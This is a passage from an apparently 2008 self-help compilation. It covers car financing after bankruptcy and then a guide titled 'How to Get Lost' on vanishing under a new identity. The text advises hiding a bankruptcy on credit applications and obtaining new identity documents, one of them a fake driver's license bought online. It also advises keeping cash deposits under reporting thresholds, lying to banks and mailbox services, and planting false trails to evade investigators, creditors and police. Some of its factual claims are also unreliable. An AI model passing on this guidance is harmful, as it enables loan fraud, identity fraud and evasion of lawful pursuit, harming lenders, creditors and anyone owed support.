you should find plenty +of owners desperate to sell in this way as they need to more to +some other area of the country. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 210 - +Reproduction in any form is prohibited without written permission. + +Since a realtor really doesn't have anything to do with your +mortgage, they need not know that your past includes a +bankruptcy. If you volunteer the information, they may run for the +hills as nothing frustrates a realtor more than putting together a +deal the buyer can't qualify for. That's why today realtors are +requiring prospects to obtain mortgage pre-qualifications before +they will work with them. +Leasing or Buying a Car After Bankruptcy +Cars are no luxury in our society. They are a real necessity unless +you live and work on a bus line in a major city, which few of us can +boast. Even though you've been through a bankruptcy, you have +options. You don't have to get your wheels from one of those "we +finance anyone" thieves. Instead you can deal with a major +dealership, in fact the larger the dealer the better. +Foreign cars are hot today. The most popular car in the country is +the Toyota Camry. So Toyota dealers can afford to be a bit picky +about who they sell or lease to. +The salespeople over at your local Ford and GM dealer are much +hungrier and more willing to work with you. And some of the cars +aren't all that bad. I'm not a Ford man, but the Ford Taurus is +rather nice, not fancy but it's comfortable enough and is well- +made. The Sable is the same car with all the luxury trimmings. On +the GM side the small Saturn is very well made and gets high +marks by various rating magazines. +Once again, some auto financing firms will reject you out of hand if +they know you've been involved in a bankruptcy. So do as you did +before, leave that little check box after the question "have you +ever filed bankruptcy" empty. +Tell the leasing manager your story and ask him what you should +do. Unless he's a mindless company man, he'll not only let you +slide, he'll arrange and orchestrate it. After all he wants that +sale/lease deal to go through. It's in his interest and he knows on +which side of the bread the jam resides. +Large dealerships have more leverage with the manufacturer's +financing firm. Because they move more volume than the smaller +dealers, they have more leverage when it comes to getting +marginal applications (like yours) approved. And the best part +here is that you're financing your car through one of the most +respected creditors on the planet which will give you a solid gold +credit reference! +© Copyright 2008, Ariza Research, All rights reserved - ABP - 211 - +Reproduction in any form is prohibited without written permission. + +Be very careful however. The salesman may smile and process +your application only to tell you later that he was forced to submit +your application to a special high-risk creditor instead of the usual +name-brand firm. This is a trap you don't want to fall into. You'll be +paying more and you'll get a lesser known creditor listing on your +credit file which you should avoid. Make it clear that you're only +interested in financing through Ford Motor or GM Acceptance. +Instead, offer to make a down payment. It would be unrealistic for +you to expect a no money down deal at this stage of the game. If +you can get your hands on a total of $1,500, tell them you can +come up with $750 or $850. Later if there's a problem you can +offer to come up with a larger down payment which should give +the salesperson just what they need to close the deal. +Do not hand over your credit card or give them your social security +number until you have an understanding with them that they are +not to generate any "external inquiries" on your credit file until the +deal is almost complete. Too many such inquiries will work against +you and you may have to visit two or three dealerships before you +complete a successful transaction. +If a payment from GM was included in your bankruptcy, I'd forget +them at least for now. Or if you ever paid a loan late to any +division of GM the same would apply. They have long memories +those computers. +Determine in advance how much of a payment you can afford, +then stick to your guns. Don't let them push you into paying more +than you can afford as that will endanger your temporarily fragile +financial situation. +Beware of dealers that sell cheap cars or cars that have just +arrived in the market place from new manufacturers. These days +KIA is offering to finance anyone who can walk in the door. But the +problem is - their cars are not well respected. They offer a great +warranty because their cars aren't very reliable. Check with +Consumer Reports and you'll see what I mean. They're financing +is low-quality and you don't want it on your credit file. +Sometimes a well-known bank will step into the high-risk market in +the search for increased earnings. If your salesman mentions a +special bank program, quickly ask the name of the bank. If you +don't recognize it instantly - steer clear unless you have to. +Ford and GM both have a short term lease for their higher risk +customers. It's only two years long. Perhaps that would be perfect +for you as you'll probably be in a position to purchase or lease a +much better car by the time your lease expires. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 212 - +Reproduction in any form is prohibited without written permission. + +And if you make all your payments on time and return the car in +excellent condition (they'll charge you like mad if you don't) you +will become a "gold key" customer and they will treat you like a +king. You can have your pick of any car on the lot! The financing +will be arranged in minutes, not days. +Keep in mind that GM now owns Hyundai and Ford now owns +Mazda and each shares a common financing system. So your +next car may be a nice foreign job. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 213 - +Reproduction in any form is prohibited without written permission. + +How to Get Lost – And Stay That +Way! +By James Petersen +© Copyright 2007, Ariza Research, All rights reserved +Disclaimer +This report is for informational and academic purposes only. Nothing in it is +intended to in any way encourage illegal activities now or at any time in the +future. Before attempting to employ any of the techniques discussed in this +report, consult a local attorney familiar with laws in your area. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 214 - +Reproduction in any form is prohibited without written permission. + +Introduction +Laws change and the laws regarding the creation and use of +alternative identity documents have been changing quite rapidly of +late. Please be careful to review the laws regarding identity +creation and use before you consider using the techniques +discussed in this report. Please don’t break the law. +I've always admired people who periodically reinvent themselves. +Rather than be content with living in a rut or rolling over and dying, +they manage to find just the right cause and reemerge once again +as a butterfly of a different color. For them the status quo just +won't do. Elizabeth Taylor is the finest example I've found of a +truly resilient individual. +The information contained in this report was collected over a +period of three years from more than thirty individuals. These +freedom lovers created a new life for themselves by vanishing and +then resurfacing in a new location under an entirely new identity. +At first my intention was to provide a complete step-by-step +checklist that anyone could use to drop out of sight but after about +a dozen interviews but I quickly discovered that each person’s +situation is entirely unique. +So what I’ve done instead is to provide you with a basic +framework of general strategies and then include other random +insights that may or may not be of use to you in your search for a +new beginning. Before we go into specific strategies, we’ll start off +with the most important basic rules. +Rule Number One +And it really doesn’t matter who’s looking for you. It might be the +mob, a gang, a revenge-minded ex-spouse or a just plain crazy +person. After you shed your original identity, some sort of attempt +will be made to find you. +After you go, everyone who knew you well will probably receive a +phone call from an investigator. At first they will just ask for +information. They will take any info they can get, but they’ll also be +sizing up all your friends and relatives for further calls. +They’ll use tricks like calling your parents and posing as an +attorney who has a huge check for you from the estate of +someone you did a favor for some years ago. Or they may +graduate to offering generous cash rewards or even using illegal +threats. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 215 - +Reproduction in any form is prohibited without written permission. + +By telling no one of your plans, you won’t have to worry about +which of your friends and relatives might "cave-in" under the +pressure investigators will apply. +Always remember that an individual can’t reveal what they don’t +know. It seems to be a deep human need to share our adventures +and accomplishments with others. Call it pride or call it ego. +Whichever, it can quickly be your undoing. +You must keep your mouth shut from the very beginning. It +doesn’t matter whether you confide in a friend, a family member or +a lover. After you vanish, they will all come under some level of +investigative pressure. If they’re not particularly tough-minded, +you’re at risk. So make up your mind to keep this entire operation +a complete and utter secret. No exceptions! +Rule Number Two +Dump your wheels. It is completely impossible to change identities +and keep your present vehicle if it’s currently registered in your +name. No matter how you change the title, it will provide a 24- +carat solid gold link straight to the new you. +Even an amateur investigator will check with the DMV and +uncover the link in a matter of minutes. (Update: though most +states no longer sell DMV info to private citizens, licensed +investigators still have access to this data in all fifty states) +Sell your current car privately for cash. No checks, just long green. +Under no circumstances should you trade it in on your new car. +Again, this would create an obvious link. Think of your old car as +an item of identity in your old name. +After you’ve arrived in your new location you’ll buy another car +under your new name. I know this will come as a blow to those of +you who are attached to your cars, but given the free flow of +information in our society; it’s an absolute must. +You should know that over the past few years the federal +government (including the IRS) has begun to use vehicle +registration data to help them keep track of citizen movements. +For some odd reason most people are extremely truthful about +revealing their address on the vehicle registration form. +We're now getting used to paying for and receiving our license tag +stickers and annual vehicle registration paperwork through the +mail so we are forced into giving them our home address. You +should be aware that the government is now taking full advantage +of this tendency toward honesty. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 216 - +Reproduction in any form is prohibited without written permission. + +The same goes for real estate. If you own any, you'll have to sell +them off before you vanish. If you have any rental income +property, please don't delude yourself into thinking you can +somehow keep receiving income on it after you've changed your +identity. +Again, it's an obvious paper trail that links the two identities to +each other. Sell the property and clear the check for the proceeds +through your old bank account. After it clears withdraw the cash +slowly over as long a period as possible. +Rule Number Three +As you create the new you, it’s imperative that you constantly +strive to reduce any links between your old persona and your new +self. Some links will always exist. They’re unavoidable. +Fortunately for you, most non-law enforcement investigators do +little more than scan the latest edition of the various directories +that are their bibles. They search the DMV, auto registration, utility +records, voters registration, public records including court and +property records and phone records. +If you plan your work and work your plan you’ll end up with a +relatively solid identity that will stand up to a moderate degree of +investigation. Most skip tracers will spend a few weeks "working" +your case. After that they’ll become exhausted and shelve your +file. Any further effort would not be profitable, so they'll usually put +your file on the back burner. +If you’re still undiscovered six months later you can assume that +you're safe, unless you do something stupid in which case the +whole house of cards will come crashing down with a loud "thud". +And remember, one wrong move could resurface several years +later to destroy all you’ve worked for. Careful planning and +execution will make the job of finding you so difficult that almost +any investigation will run out of gas well before they find you. +This report will provide you with some rather inventive strategies +that will effectively cover your tracks and make live difficult for +anyone on your trail. +If you’re leaving an ex-spouse or lover, refrain from taking +anything from them that isn’t truly yours. The last thing you need is +an ex-lover/spouse on your trail seeking revenge. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 217 - +Reproduction in any form is prohibited without written permission. + +After you establish your new identity and relocate - carry only +identification in your new name. It’s best to burn all of your old ID +documents and credit cards. If you don’t - at least hide them in a +very secure place away from your new residence. +A brief story with a message. A man killed his wife and vanished. +The police worked the case for over three years to no avail. Finally +the family of the dead woman hired one of the best private +investigators in the country. +He asked the police what the wanted fugitive did for a living and +when he heard he boasted in full voice that he could find the man +within ten minutes. He asked about the reward. The police replied +it was a whopping $50,000. He asked that the police chief put it in +writing which they did. +The investigator then called the offices of a popular architecture +trade publication. Posing as an architect he told them that he was +getting married and wanted to invite an old college friend but didn’t +have his current address. +The nice lady in subscriptions provided the address in less than +two minutes. He handed the data over to the police who +immediately had the man arrested and the clever investigator +went home with a check for fifty grand for only two minutes work! +Even the smallest link can be a disaster. Leave your magazine +and any other mail subscriptions to lapse. Any attempt to change +an address will create an unacceptable link. +You’ll also have to abandon your favorite hobbies and social +activities. These are other avenues investigators will use to find +you. One man was found by his alimony-hungry ex-wife when an +investigator made the rounds of his new home town showing his +picture to all the owners of the stores that sell those little electric +model racing cars than run on slotted tracks. They only had to +contact four stores before they discovered his new hang-out. +The next Saturday morning our man came strolling into the place +completely unaware that he was about to be arrested. For at least +the first six months or a year stay away from the places you would +normally gravitate to. Instead, plan to explore entirely new hobbies +and activities. +You’ll also have to change or alter your occupation. An +investigator will easily find you if you’re in a licensed trade or +profession. An experienced investigator will know to call all the +probable employers in your new town. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 218 - +Reproduction in any form is prohibited without written permission. + +One fellow I knew was a cab driver. When an investigator started +to make calls to all the cab companies in a town he stumbled on +his target on only the second call! Don’t make it easy for them. +If you take the tools of your trade with you, they'll give your +pursuers an excellent idea of your intentions and where they may +find you. It might be best to make a show of leaving them behind +even though you plan to continue on working in that same field. +The motto is - don’t leave links behind that can lead an +investigator to you. Make yourself untraceable. +It’s amazing to me that so many identity-changers overlook little +details like magazine subscriptions and credit cards. (Don't even +think of using your old credit cards at your new location - tracking +your movements by your credit cards records is a very simple +process these days.) +Rule Number Four +This is a biggie. Maybe it should be number one. Do not leave +debts behind! Far too many identity-changers find it impossible to +resist the greedy urge to run up their credit cards before shedding +their old lives. This is some of the best advice I can give you. +Your new life will be much more secured with no one on your trail. +If you’re the subject of an FBI manhunt, you’ll be lucky to last ten +days, even if you’re very, very clever. If only the local police are +looking for you, you might last a few years or longer. If no one is +actively looking for you – living under your new identity will be a +breeze. +Leaving behind even a small debt can cause big problems later on +down the road. One lady worked for a full year to create a new life +for herself, which was completely exposed by a persistent +collection agent who tracked her down over a lousy $85 phone bill +she left behind! +And to make things worse, she had intended to pay the bill but +didn't as it arrived a few days after her departure. Be sure you +cover all the bases and get those bills paid in full. +Skip tracers and bill collectors manage to locate about 75% of +their targets. Be sure you’re in the 25% they don’t find. Smart +identity-changers are usually successful while criminals are +usually caught after a few weeks or months. It’s all a matter of +whose looking for you, how motivated they are and how carefully +you’ve constructed your new life. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 219 - +Reproduction in any form is prohibited without written permission. + +If no one is on your trail, what have you got to worry about? +Nothing! This is the only way to establish a really sound new +identity. With no one working from the other end to expose you, +you can go about your business without much worry. +But if you leave debts of any kind behind, you can count on having +an experienced, determined bank investigator on your trail and +they won’t easily give up. Some things just aren’t worth the risk. +And if the bank investigator thinks he detects credit card fraud, +you can bet he’ll have considerable resources placed at his +disposal. This is not the way to start a secure new life. +Rule Number Five +Burn your bridges. Your old and new selves must be completely +divorced. No phone calls back to old lovers. No contact with family +members. +When ex-mobsters testify against their former Mafia bosses, the +government puts them in a witness protection program. They are +given completely new identities and moved to new locations. +Many of these guys have been brutally murdered just because +they phoned family members directly or mentioned something in a +letter that could be used to locate them. +If you search around the web you'll find some very interesting +information on the federal witness protection program. It includes +a checklist that you should read. +Many people find it very difficult to abandon their old clergymen, +doctors, neighbors, friends and family members. Once the +subjects have been briefed and are ready to travel to their new +location, they are flown there through a minimum of three +intermediate locations. +They fly under assumed names and in each city they are housed +in a government "safe house". Since hotel records are easily +checked, this ensures that they'll leave behind no traceable +records. +After a few days in each spot, they move onto the next. It must be +a real pain having to travel around the country on the sly but +through hard experience the feds have learned that this is the only +really effective way to move someone from one place to another +without leaving behind a paper trail. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 220 - +Reproduction in any form is prohibited without written permission. + +You might want to explore getting a divorce or filing for bankruptcy +(or both!) before your departure. If either one is tempting, consult +with an experienced attorney for expert advice. (Ariza Research +publishes a unique bankruptcy guide entitled "Bankruptcy +Secrets". For more info visit our web site at: www.ariza- +research.com/bankruptcy.) +If you ask, the post office will tell you that their official policy is to +never open mail (except when a letter ends up in the dead letter +office - where it’s opened in an attempt to obtain a delivery +address). What they don’t tell you is that every day of the week +postal officials turn over tons of mail to various government +agencies that DO open your mail. +Don’t trust the mails! If you must communicate by letter, use mail +drops and use code words or phrases. If you want to report +whether or not something took place - make up a code that +anyone reading the letter would never be able to figure out. +If you mention your Aunt Jane - that means the task was +completed as planned, while a mention of your Uncle Arthur +means something went wrong. +It’s sad fact that we live in a country where the government +snoops on it’s own citizens. (And don't be deluded into thinking +that the government has to bother with obtaining search warrants +or court orders to read your mail or listen in on your phone +conversations. The so-called national security administration ( +NSA ) listens in to millions of domestic phone calls every day +under it's "Echelon" program!) +If you’re attempting to escape an ex-lover or spouse, resist the +temptation to call and taunt them. As much as you might enjoy it, +"caller ID" is everywhere these days and phone company records +are an open book to an attorney, an investigator or a cop. After +your first call, your target can now call the phone company and +report they've been receiving obscene phone calls. +The phone company will then monitor your target's line and report +your number to the police for investigation. When the detectives +on TV or in the movies are looking for a connection between the +victim and a suspect, they always turn to the phone records. +("Usage Details") +If you must phone home at least use a pay phone in a town as far +as possible from your real location, keep the call short, use one of +those pre-paid long distant cards (which you, of course, +purchased for cash) and don’t make a second call. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 221 - +Reproduction in any form is prohibited without written permission. + +Here's a little piece of information you just might find interesting. +Those nice folks down at Radio Shack and others sell a device +called a "Caller ID Blocker". You plug this small plastic device +between your phone and the connector on the wall. When you +make an outgoing call, this little wonder blocks caller ID so that no +one can determine your phone number. +Just be sure to pay in cash and decline to give the sales clerk any +information when he asks. When he asks for your last name, just +say "cash". That will usually take care of it. +Now that we’ve covered the basics, let’s move on to some actual +planning. +Pre-move Planning +Successful identity changing demands careful planning and +flawless execution. Anyone who attempts to change identities with +a casual attitude or goes at it too quickly is doomed to failure. This +all takes time, effort and courage to break away from whatever +pleasure and support you might presently be enjoying. +The first priorities are to obtain new identity documents and +accumulate as large a cash grubstake as possible. Once you have +your new drivers license, find one of those "secured credit card" +banks. You put up some cash, usually a minimum of $200 or so +which goes into an interest-bearing savings account. +They then issue you a genuine Visa or MasterCard credit card +with a credit limit secured by the savings account. Some banks do +a credit check while others don't bother but either way they'll +accept almost anyone. +You don’t get much credit but it does provide you with a genuine +bank credit card in your new name in less than a month. When +you go looking for living quarters, it will make you look much more +trustworthy and reliable. And it’s an excellent form of ID. Without a +major credit card, you’re really lost out there. During a recent job +interview one lady was asked if she had bank credit cards, when +she showed the interviewer two - she was quickly hired. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 222 - +Reproduction in any form is prohibited without written permission. + +Here’s a list of banks that issue secured credit cards: +Phone Minimum +Bank/Firm +Number Deposit +Chevy 1-800-937- +$300 +Chase 5000 Ext. 99 +1-800-470- +Best Bank $250 +6111 +Community 1-800-779- +$300 +Bank 8472 +Bank of 1-800-243- +$500 +America 7762 +Orchard 1-800-688- +$200 +Bank 6830 +First +1-800-658- +National $250 +3660 +Bank +Bank One 1-800-945- +$500 +of Arizona 2000 +Chase 1-800-482- +$300 +Manhattan 4273 +Federal 1-800-290- +$250 +Savings 9060 +Cross +1-800-262- +Country $200 +3610 +Bank +First 1-800-876- +$100 +Consumers 3262 +Call several banks and ask a lot of questions. Do they require a +credit check? (if your lucky you may find one that doesn't bother) +Do they have a minimum residency requirement (usually one +year)? Do they have a minimum salary requirement? Do they +require that you have an address and phone number in your +name? +Some banks are much more liberal than others. Tell them that +you’ve recently returned from living overseas and have no credit +record and need to establish one - that's why you want the card in +the first place. +After your move should someone send you a check, you’ll have a +very tough time cashing it without the credit card. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 223 - +Reproduction in any form is prohibited without written permission. + +By the way, try not to deal with those storefront "we cash any kind +of check" places. The clerks in those place are extremely +suspicious people. They see a steady flow of scam artists, +criminals and other low-lifes. How can they cash all kinds of +checks? +It's simple, they make extensive use of on-line database +verifications. When you cash a check there - they spread your +personal information all over the place. Not a good thing to do +when you’re trying to live a low profile life. +The police make a lot of arrests in these places. Should one of the +clerk's computers indicate that there may be a problem with your +or your check, they will immediately call the police and let them +arrest you and then sort it all out. Stay away from these joints at +all cost! +When you use your new secured credit card, you’ll be steadily +building a new credit history in your new name. These secured +credit card banks report your payment history back to the credit +agencies each and every month. So to make the most of one of +these cards be sure to immediately charge up to around 80% of +your credit limit. +Then make the payments immediately when you get the bill each +month. There are only two iron-clad rules here: do not go over the +credit limit AND do not miss even a single payment. Pay the +minimum which ensures that you will pay the maximum interest, +which the bank will just love you for. +After one year of perfect payments you’ll start to get offers for +unsecured cards from all sorts of banks. In some cases the same +bank that issued you the secured card will offer you an unsecured +card at a much lower interest rate. +At that point your credit will be solid enough to qualify for +unsecured cards. Apply for two and when you get your first +unsecured card, mail the secured card back to the issuing bank +and get your deposit money back, plus the interest! +There is another way to get a genuine bank credit card in as little +as a week. You call around to the all the banks in your area asking +if they offer either a MasterCard or Visa "debit card". +If they do, ask them if a credit report is required. Due to all the +credit card fraud going on, most banks still require a credit check. +But many aggressive banks, who are particularly eager to get +cards out there or are new to the game aren’t quite so careful. +When you locate the right bank, run down there and open a +checking account. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 224 - +Reproduction in any form is prohibited without written permission. + +Put as much cash as you can into the new account and ask for the +debit card. In less than two weeks you should have the card. It +looks like a genuine card and operates just like one except for two +differences. +Debit card transactions are immediately deducted from your +checking account instead of being billed. And, more importantly, +the bank does not report your payment history to the credit +agencies so debit cards are of no use whatever in establishing +credit. +Accumulate cash in preparation for the big move. Not a balance in +your checking account, I’m talking about a good old-fashioned +folding money. Find a good hiding place and start piling it up. Build +it slowly if you can afford to take the time. Tens and twenties are +best. The last thing you’ll do when you leave town is sell your car +which will provide the cash you’ll need to buy another set of +wheels in your target location. +If you have more than $2,000 in cash you may want to rent a bank +safe deposit box and deposit the cash there. You can return at +any time and pick up whatever you need. This way you can move +wherever you want without fear of loss. +Be aware that banks are required to notify the government on all +cash transactions over $500 but don’t usually bother with sums +under a couple of grand. (Update: banks are now required to file +IRS forms on all transfers of $3,000 or more. To be safe, keep any +transactions well below this threshold.) +But don’t take chances you don’t have to. The government has +also stopped printing the larger denomination bills. The largest bill +now being printed is the new $100. This makes carrying around +large sums of money more difficult. +It also makes it more difficult for drug dealers to export money +back to their overseas sources. If you can, try and stockpile only +the new bills. Uncle Sam is slowly but steadily moving toward a +dual money system with one currency being used at home and +another entirely different color and style of cash being used +overseas. +Sell off personal items as quickly and as quietly as possible. The +more cash you have the better. Remember, it will take a full year +to establish credit in your new name. During that time you can +only buy what you can afford to pay for in cash. Your entire living +standard for the next year will be dictated by how much cash you +can accumulate now. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 225 - +Reproduction in any form is prohibited without written permission. + +Your new location should either be a city or a large town. Put +some distance between your old and new worlds. Move at least +800 or more miles from your old stomping grounds. And it’s +mandatory that you move across state lines. Do not return to a city +you lived in during the past, no matter how long ago it was. +Stay away from remote rural areas and busy tourist zones. You’ll +be too obvious there. +If you plan to visit your new site just to check it out, do not let +anyone there (such as a future landlord/roommate) see your +license plate. Remember, it would immediately disclose both your +home state and, in most areas, your home county. +It might be best to fly and rent a car at the airport if you can afford +to. (remember, don't use credit cards in your "old" name anywhere +in your future hometown even on a pre-move evaluation visit!) +One lady I know rented a car in her hometown using a current +credit card. She then drove it 600 miles to her future hometown +and back. This worked fine as she didn't let anyone see her tags. +(when she went to look for apartments she parked her car several +blocks away.) The car rental firms have no idea where you drive +their cars so it's a good way to go (provided you don't get any +traffic tickets during your scouting trip.) +If you’re leaving behind a bad situation, avoid relocating to Florida. +Have you ever watched one of those "America's Most Wanted" TV +shows? It seems that when most criminals skip bail, they head +straight to Florida. Florida would be a bad choice, unless you have +somewhere discreet where you can stay. +Avoid any other place where tourism is popular, unless you’ll be +happy cooped up in an apartment. If you walk the streets, there’s +a good chance that eventually a tourist from back home will +recognize you and report their sighting to others. This may sound +unlikely but in the real world it's not at all unusual. +There are several interesting alternatives to simply re-locating to +another city. One fellow I know decided he’d had enough of his +mentally unstable wife, put together some cash and bought a late- +model used recreational vehicle with all the creature comforts. He +bought it from one of those rural dealerships in a backwater little +town in Tennessee. +He paid cash and used a fake drivers license that he bought on +the internet for identification. The story he told the dealer made +sense and meshed well with his fake ID so in a few sort hours he +was on his way with an entirely untraceable vehicle. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 226 - +Reproduction in any form is prohibited without written permission. + +He wandered around the country staying at public campgrounds +for over a year, finally landing in Kansas. He found a new woman +and some friends his own age there and settled down. This +strategy worked well for him because he needed to "get away" for +a year where no one could find him. +By creating a new identity and then buying an RV in his new +name, he had the perfect "hide away". And it gave him a chance +to travel around the countryside which he had always dreamed of +doing. You can join one of several campground associations +which have campgrounds all over the country. KOA is one of the +largest. Trying to find one of these roving RVers is all but +impossible. +Hello Sailor! +Then there’s the "tramp steamer" approach. For a very reasonable +fee you can book a long cruise on various cargo vessels. They +wander all over the globe. +The accommodations are not all that fancy but you will be well fed +and at the same time - well lost. No one will be able to find you for +a number of months. And if you can afford to, you may want to +stop somewhere and spend a few months. +If you have the bread, the south of France is a favorite destination +for exiled kings and fallen dictators. For a century or more the +locals have learned not to ask too many questions. Instead they +tend to focus on the color of your money. +When you’ve settled on your new home city, remember what I told +you about keeping your mouth shut. Back during the cold war the +Russians were fond of spreading "mis-information". It was one of +their favorite tactics and for good reason. It’s a good tactic that +you should use too. +While keeping absolutely quiet about your real destination, start +broadcasting your interest in living in some remote location (the +Indians call this "leaving a false trail"). Spread the word to friends, +co-workers and anyone that might later be approached by an +investigator. +For example, if you’ve settled on moving to Phoenix, start telling +your friends about how much you’ve heard about South Carolina. +Of course you "have friends in South Carolina" who you’d would +like to visit. Let them know that, come your next vacation or long +holiday weekend, you’re going to fly out to good old South +Carolina. If you’re a good actor you might even drop a comment +like "if I like it there, who knows - I might just stay!" +© Copyright 2008, Ariza Research, All rights reserved - ABP - 227 - +Reproduction in any form is prohibited without written permission. + +The really smart identity-changers will bolster their future safety by +actually flying out to the city they told their friends they were +interested in (buying the ticket with a current credit card) and +performing several ATM and credit card transactions while there. +You might send a postcard home or better yet, a letter to your +closest friend or relative. This all beefs up the "cover story" and +creates an obvious paper trail that will later send an investigator +off on a wild goose chase in the wrong direction. Let the poor +bastard beat his brains out trying to find you in South Carolina +while you bask in the Arizona sun! +Fly - Don't Ride +Do not drive to your new location as this would risk a traffic ticket +that would blow the whole thing as such a run-in with the law +would create a document that could be easily found in the public +records. +While you’re traveling, stay away from those cheap hotels. The +police now regularly "sweep" those places and usually come away +with a bus full of criminals with outstanding warrants. Getting +caught in one of these raids could prove disastrous at this early +stage of the game. A few extra bucks will get you a more +comfortable room in a better neighborhood where you can rest +safely and securely. +The trip will be a complete waste of time if you don’t already have +at least an interim new identity established. You’ll need at least a +driver’s license in your new name. When you get to Phoenix, look +around for a stable working class neighborhood. Unless you’re +very well funded, this is where you’ll be living at least for the first +year. +Rent one of those commercial mailboxes in your new name +somewhere as near as possible to the area you’re interested in. +Under no circumstances whatever are you to use your old name +at this point. Most commercial post office box firms offer a phone +message service that will give you an instant phone number. +They may also offer a computerized "voicemail" service, which will +give you your own dedicated phone number complete with a +recorded greeting in your voice which sounds just like a standard +answering machine. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 228 - +Reproduction in any form is prohibited without written permission. + +When you fill out the form for your new mailbox, add a second +person's name in the proper form on the box. They may let this +slide (which will give you a second name for mailing purposes) or +may demand that your friend come in and furnish them with a +picture ID. +Tell them that your friend is in the military overseas or is working +in Saudi Arabia and so cannot "drop by". When you say this have +the cash in your hand in full sight. Most of the people who operate +these places will put profit over rules every day. +They also know that most of their customers are, in reality, buying +confidentiality along with the box. (A lot of their customers are +involved in adulterous affairs and need the mail drop to receive +mail from their new lady.) +Buy a newspaper and study it from front to back. Look in the +classified ads for people looking to share apartments or homes +and then scan the used car section. Moving in with a roommate is, +for a number of reasons, your best bet at this stage of the game. +This way you can get living quarters without having to go through +the usual credit/landlord/reference checks. Do not have a friend +pose as a reference. He would then know your whole plan and +would be able to expose you or even blackmail you later. +Again, your story is - you’ve just returned from working overseas +and have lost contact with old friends. Oh sure you have plenty of +good friends but they just happen to live overseas (where they +can't be easily contacted for a verification). +Dress up in good taste and answer several of the ads requesting +roommates. Go around and look at the places, get an idea of +costs. If your future roommate likes your looks, after a friendly +chat, you may be able to move in without any paperwork at all. If +they hand you forms asking for all kinds of background +information, take the forms, promise to fill them out and mail them +back. +After you've left, throw the forms away and move on to the next +place. What you’re looking for is a friendly person who will take +you in with as few questions as possible. +For your sake I hope you have a pleasant personality and smile. +You're looking for a trusting person who is content with choosing +someone based on "gut instinct". +I did this once in Washington DC. The owner of the house +interviewed me and was so taken with me that she offered to rent +me an entire house for the price of a small apartment. I lived there +alone for a full year. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 229 - +Reproduction in any form is prohibited without written permission. + +I found out later that at the time I showed up she was looking for +someone she could trust and decided to go with her instincts. She +liked my looks and offered me the place right on the spot. +Open a Checking Account +Be sure to use a different bank than you used back home. Major +banks that used to limit their territory to the inner city and suburbs +of a single city, now have branches all over a state or even +beyond. Small banks are the best bet as they are less likely to +spread your personal information around. +Stay away from the major regional banks. Take as much cash as +you can afford with you to deposit. A grand or more would be best. +It will impress the clerk and smooth the application process. Banks +like to take in money. +Do not deposit any checks that would in any way link this new +account to your old bank account, name or city. Dress and act +appropriately as all this cash would look very suspicious in the +hands of someone who looked like they just might be a drug +dealer. +If they ask for the name of your last bank and your old account +number just tell them that you had an account in the "Saudi +National Bank" in Jidda, Saudia Arabia. That should kill any idea +they have of running a verification check. +Banks in the Arab world go by the European rules, which means +they only release account information after a recognized court has +issued an official search warrant. +Getting an Apartment +You might be able to locate an individual apartment with a little bit +of luck. Most decent apartment complexes are managed by large +firms who are very suspicious of applicants who are new to their +town. +They will insist on running a rather deep background credit check +and will want to verify your employment. They will also ask to talk +with your current landlord. +If you tell them that you’ve been living with your parents for +several years following a bad divorce, they may let you lease an +apartment, though they may demand several months extra deposit +due to your lack of verifiable rental history. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 230 - +Reproduction in any form is prohibited without written permission. + +If your credit is shot, you will either be refused or they may insist +on a really punishing security deposit of up to two grand. +It all depends on the rental market. If they need your business +they’ll bend over backwards to get you into one of their units, +providing you look reputable. If their occupancy rate is +approaching 100%, you’ll probably have a very tough time. +Check it out for yourself. Again, the better working class +neighborhoods are best. Avoid the really poor areas as slumlords +there tend to be the most demanding when it comes to +background checks. +Another advantage of the shared home approach is that you don’t +have to deal with the utility companies whose records are open +books. Getting electricity and a phone connected will set you back +quite a bit in deposits since you have no established credit or +verifiable utility history. +This lack of history will raise a giant red flat with any utility +company. They're afraid that you won't stick around to pay your +bills. When you ask about the rent in a sharing situation, they +usually say something like "$400 a month plus half the utilities and +all your long distance phone calls". +And because investigators use utility records to locate people, the +shared approach allows you to live invisibly, with your name not +appearing on any utility records. Talk about being low-profile! +Living as a roommate is zero-profile. +Are You a Real Beauty? +A note here about attractive women. If you are a woman under +age 45 or so, with average or above average looks, you have a +special advantage here. +Did you know that there is only one type of fugitive that bounty +hunters won’t bother looking for. They won't lift a finger to search +for attractive young women. Why? Because an attractive woman +can breeze into any good sized town, crawl into a singles bar and +quickly locate a guy to "shack up" with. +A shacked up woman is, in effect, invisible from a public records +standpoint. +The lease and all of the utilities are in the guy’s name. She +continues to drive on her out of state drivers license, so unless +she’s stupid enough to go and get a new drivers license, the local +DMV has no idea where she is. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 231 - +Reproduction in any form is prohibited without written permission. + +It’s as if she dropped off the face of the earth! Unless she makes a +mistake, she’ll never be found. Also an attractive woman who +needs to change her name quickly can simply get married which +makes her much more difficult to find. It’s a bit more difficult for +men. +Your Personal Story +Get your new "life story" squared away. Take a pad and pen and +write it all down. Read it aloud until it sounds good. Embellish it +but not too much. Don’t get carried away. Don't try to claim you +were a surgeon unless you can talk the talk like a real doctor. +Try to anticipate any obvious questions. With some effort the +pieces will all fall into place. If you’re moderately bright you should +be able to ad-lib any other answers. Then get it all straight in your +head. Repeat it all until you’re comfortable with it. +Should someone ask about your divorce or some other area of +your past you would rather not have to explain, you can always +indicate that the subject is still painful by saying "I’d rather not talk +about it". +Most people will back off and not bring it up again anytime soon. +Over time a strange thing will start to happen. You’ll actually start +to believe your new life story. +After a year or so it will fit you like a glove and you’ll have to strain +to remember the actual life you left behind. It may sound strange +but if you've never actually done it, but by living a new life you can +become an entirely new person. 